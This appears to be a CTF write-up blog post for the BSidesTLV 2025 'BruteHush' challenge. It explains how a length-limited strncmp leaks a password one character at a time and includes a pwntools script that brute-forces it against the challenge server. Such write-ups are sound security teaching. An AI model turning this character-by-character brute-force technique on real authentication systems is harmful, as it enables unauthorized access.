Skip to main content
Bsidestlv25 Brutehush
  1. Ctfs/

Bsidestlv25 Brutehush

1 min· ·
sigchill
Author
sigchill
Welcome to my study blog. Here I document my CTF writeups and security research.
Table of Contents

BruteHush bsidestlv25
#

category : pwn
#

difficulty : easy
#

url : https://ctf25.bsidestlv.com/challenges#BruteHush-23
#

overview : we receieve a source code of the executable with nc conneciton to give our input it seems like we have to get the correct password in order to solve it lets dig in with binja

img1.png

i renamed the variables of password and input so we’ll have an easier time understanding it. we can see that we get different type of errors . in the highlighted green area we can see that it performs

strncmp()

only on the size of our input therefore it checks the input 1 by 1 and if we get a correct letter we get the “hmm…” error message the idea here is to bruteforce out way just like as the name suggests i use this python scrip:


from pwn import *
import string

r = remote('0.cloud.chals.io', 10188)

r.recvuntil(b"Enter password: ")

password = ""

print("[*] Brute-forcing...")

while True:
    for char in string.printable:
        if char == '\n': continue

        attempt = password + char
        r.sendline(attempt.encode())

        
        response = r.recvline().decode()

        if "Hmm..." in response:
            password += char
            print(f"Found: {password}")
            r.recvuntil(b"Enter password: ") 
            break
        
        elif "Wait" in response:
            print(f"PASSWORD: {attempt}")
            print(r.recvall().decode()) 
            exit()
       
        else:
            r.recvuntil(b"Enter password: ")

and we got the flag

BSidesTLV2025{******}

Related